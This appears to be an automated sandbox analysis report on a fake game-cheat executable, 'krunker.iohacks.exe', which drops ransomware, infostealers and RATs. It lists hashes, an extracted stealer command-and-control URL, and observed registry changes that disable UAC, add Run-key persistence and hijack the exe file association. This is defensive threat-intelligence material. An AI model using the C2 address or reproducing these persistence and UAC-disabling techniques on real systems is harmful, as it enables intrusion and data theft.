Resubmissions
02-09-2024 06:59
240902-hsk4hawbnd 1002-09-2024 06:58
240902-hrpqaswbmb 1002-09-2024 02:33
240902-c16ghszgkh 1016-04-2024 14:39
240416-r1ca1ace39 10Analysis
-
max time kernel
581s -
max time network
589s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-01-2024 22:08
Static task
static1
Behavioral task
behavioral1
Sample
krunker.iohacks.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
krunker.iohacks.exe
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
krunker.iohacks.exe
Resource
win10v2004-20231222-en
General
-
Target
krunker.iohacks.exe
-
Size
30.9MB
-
MD5
2850f1cb75953d9e0232344f6a13bf48
-
SHA1
141ab8929fbe01031ab1e559d880440ae931cc16
-
SHA256
892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
-
SHA512
25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
-
SSDEEP
786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK
Malware Config
Extracted
lumma
http://soupinterestoe.fun/api
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Neshta payload 9 IoCs
resource yara_rule behavioral4/memory/1952-571-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/memory/2456-586-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/memory/4304-876-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/memory/3044-1755-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/memory/5504-2065-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/memory/4492-2250-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/files/0x000100000002a7c2-25.dat family_neshta behavioral4/memory/6752-4141-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral4/memory/2304-4288-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta -
Maze
Ransomware family also known as ChaCha.
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4696 1500 schtasks.exe 134 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6896 1500 schtasks.exe 134 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6696 1500 schtasks.exe 134 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6612 1500 schtasks.exe 134 -
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bot.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" bot.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" bot.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
resource yara_rule behavioral4/memory/1456-703-0x0000000000080000-0x0000000000114000-memory.dmp dcrat -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 27 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware wscript.exe -
Modifies Windows Firewall 1 TTPs 3 IoCs
pid Process 400 netsh.exe 5172 netsh.exe 4528 netsh.exe -
Drops startup file 18 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7DB3.tmp [email protected] File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6ce70cc8365b721.tmp netsh.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe system.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_R_E_A_D___T_H_I_S___BWR0F_.hta.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7D9C.tmp [email protected] File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt netsh.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\decrypt-files.txt [email protected] File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\_R_E_A_D___T_H_I_S___6NWUK75_.txt [email protected] File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.Cyborg Builder Ransomware wscript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_R_E_A_D___T_H_I_S___6NWUK75_.txt.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ce70cc8365b721.tmp netsh.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt netsh.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.Cyborg Builder Ransomware wscript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\UqHLX7zx6p.8834.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe system.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ [email protected] File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\_R_E_A_D___T_H_I_S___BWR0F_.hta [email protected] File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe.Cyborg Builder Ransomware wscript.exe -
Executes dropped EXE 64 IoCs
pid Process 5116 4363463463464363463463463.exe 3044 bot.exe 764 [email protected] 2564 [email protected] 1676 [email protected] 1916 RIP_YOUR_PC_LOL.exe 4024 ska2pwej.aeh.exe 1332 1.exe 1788 x2s443bc.cs1.exe 4792 bot.exe 2292 ska2pwej.aeh.tmp 4368 x2s443bc.cs1.tmp 4488 Conhost.exe 4068 msedge.exe 1648 10.exe 2304 svchost.com 1064 TEMPEX~1.EXE 1304 TEMPEX~1Srv.exe 5040 TEMPEX~1SrvSrv.exe 1952 svchost.com 2456 svchost.com 4476 TEMPSP~1.EXE 1008 msedge.exe 1492 7.exe 4528 netsh.exe 1496 5.exe 1456 6.exe 4304 svchost.com 5504 svchost.com 4492 svchost.com 6208 as.exe 6752 svchost.com 5780 tuc2.exe 2696 tuc2.tmp 6216 svchost.com 6592 system.exe 6036 AUDIODG.EXE 5820 sendreportsform.exe 5280 bot.exe 7140 taskdl.exe 6516 @[email protected] 6100 @[email protected] 5136 svchost.com 660 taskse.exe 5804 @[email protected] 484 taskdl.exe 5360 taskse.exe 1968 @[email protected] 1836 taskdl.exe 4192 taskse.exe 5132 @[email protected] 1832 taskdl.exe 3628 @[email protected] 4488 taskse.exe 2380 taskdl.exe 284 taskse.exe 708 @[email protected] 6876 taskdl.exe 5428 @[email protected] 4392 taskse.exe 5864 taskdl.exe 6168 @[email protected] 6360 taskse.exe 5592 taskdl.exe -
Loads dropped DLL 3 IoCs
pid Process 2696 tuc2.tmp 2696 tuc2.tmp 2696 tuc2.tmp -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2228 icacls.exe 736 icacls.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" bot.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/memory/2564-36-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral4/memory/2564-189-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral4/memory/2564-174-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral4/memory/2564-195-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral4/memory/2564-250-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral4/memory/4476-574-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral4/memory/5040-573-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral4/memory/1304-570-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral4/memory/2564-1972-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral4/memory/4476-2066-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral4/memory/2564-39-0x0000000000400000-0x00000000005DE000-memory.dmp upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 91.211.247.248 -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\bot.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\ProgramData\\Microsoft OneDrive\\setup\\System.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\00000000\\bot.exe\"" 6.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\DesktopShellAppStateContract\\dllhost.exe\"" 6.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" 7.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." system.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." system.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lldluhdhlxabv396 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\tasksche.exe\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" bot.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bot.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bot.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\a: [email protected] File opened (read-only) \??\p: [email protected] File opened (read-only) \??\q: [email protected] File opened (read-only) \??\r: [email protected] File opened (read-only) \??\t: [email protected] File opened (read-only) \??\x: [email protected] File opened (read-only) \??\b: [email protected] File opened (read-only) \??\n: [email protected] File opened (read-only) \??\w: [email protected] File opened (read-only) \??\g: [email protected] File opened (read-only) \??\i: [email protected] File opened (read-only) \??\o: [email protected] File opened (read-only) \??\y: [email protected] File opened (read-only) \??\u: [email protected] File opened (read-only) \??\e: [email protected] File opened (read-only) \??\h: [email protected] File opened (read-only) \??\j: [email protected] File opened (read-only) \??\k: [email protected] File opened (read-only) \??\l: [email protected] File opened (read-only) \??\m: [email protected] File opened (read-only) \??\s: [email protected] File opened (read-only) \??\v: [email protected] File opened (read-only) \??\z: [email protected] -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf bot.exe File opened for modification C:\autorun.inf bot.exe File created F:\autorun.inf bot.exe File opened for modification F:\autorun.inf bot.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Holographic-Desktop-Analog-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\eeprom_qca9377_1p1_NFA425_olpc_A_BC_CBXA0.bin.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\KBDMAC.DLL.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\tracerpt.exe.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ComDTC-merged-Package~31bf3856ad364e35~amd64~~10.0.22000.434.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StepsRecorder-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\DriverStore\FileRepository\microsoft_bluetooth_hfp_ag.inf_amd64_84a210036c6c1bdf.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\getevent.types.ps1xml.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\dot3cfg.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\deviceaccess.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Package-UNP-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\en-US\sxproxy.dll.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\KBDGRLND.DLL.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\spbcd.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\DriverStore\FileRepository\mdmrock5.inf_amd64_d7e3f61b70de13bc.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\mfc120u.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\ustprov.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-KernelInt-VirtualDevice-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\DriverStore\en-US\c_legacydriver.inf_loc.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\BOOTVID.DLL.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\mscories.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\tracerpt.exe.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\Dism\en-US\TransmogProvider.dll.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\Speech\Engines\SR.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\mfaudiocnv.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Connectivity-Serial-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Casting-Platform-Package~31bf3856ad364e35~amd64~~10.0.22000.100.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\DriverStore\FileRepository\rtux64w10.inf_amd64_a39ece60dbc76c55\rtux64w10.sys.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\setx.exe.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\Windows.StateRepositoryCore.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\Configuration\Schema\MSFT_FileDirectoryConfiguration\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\en\Microsoft.Windows.Firewall.Commands.Resources.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Guest-Vpci-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Networking-Containers-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\SystemSupportInfo.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\msiexec.exe.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\printui.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\ws2help.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\mssip32.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\wbem\Remove.Microsoft.AppV.AppvClientWmi.mof.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\kanji_1.uce.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\DxpTaskSync.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\INETRES.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\SystemPropertiesPerformance.exe.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\xwtpdui.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\en-US\osbaseln.dll.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\wbem\mispace.mof.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\MSFT_DtcLogTask_v1.0.cdxml.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EudcEdit-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\NetworkList.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\hidphone.tsp.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\ir41_32.ax.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\Windows.AccountsControl.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ServiceResource\en-US\MSFT_ServiceResource.schema.mfl.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\XpsToPclmConverter.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-IoTEnterprise-License-Package~31bf3856ad364e35~amd64~~10.0.22000.120.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\DriverStore\en-US\SCRAWPDO.inf_loc.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\wbem\en-US\netswitchteamcim.dll.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SysWOW64\Windows.ApplicationModel.Store.Preview.DOSettings.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22000.348.cat.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\Windows.System.UserProfile.DiagnosticsSettings.dll.Cyborg Builder Ransomware wscript.exe File opened for modification C:\Windows\SysWOW64\IME\SHARED\ImeBrokerps.dll.Cyborg Builder Ransomware wscript.exe -
Sets desktop wallpaper using registry 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp" netsh.exe Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpCB5E.bmp" [email protected] -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1492 set thread context of 6464 1492 7.exe 167 PID 1492 set thread context of 5872 1492 7.exe 173 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-phn.xrm-ms.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\types\ISemanticTextColors.js.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_contrast-black.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-ppd.xrm-ms.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\ga.pak.DATA.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\santuario.md.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ONNXRuntime-0.5.X.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\SnipSketchAppList.targetsize-40_altform-unplated.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.targetsize-72_altform-unplated.png.Cyborg Builder Ransomware wscript.exe 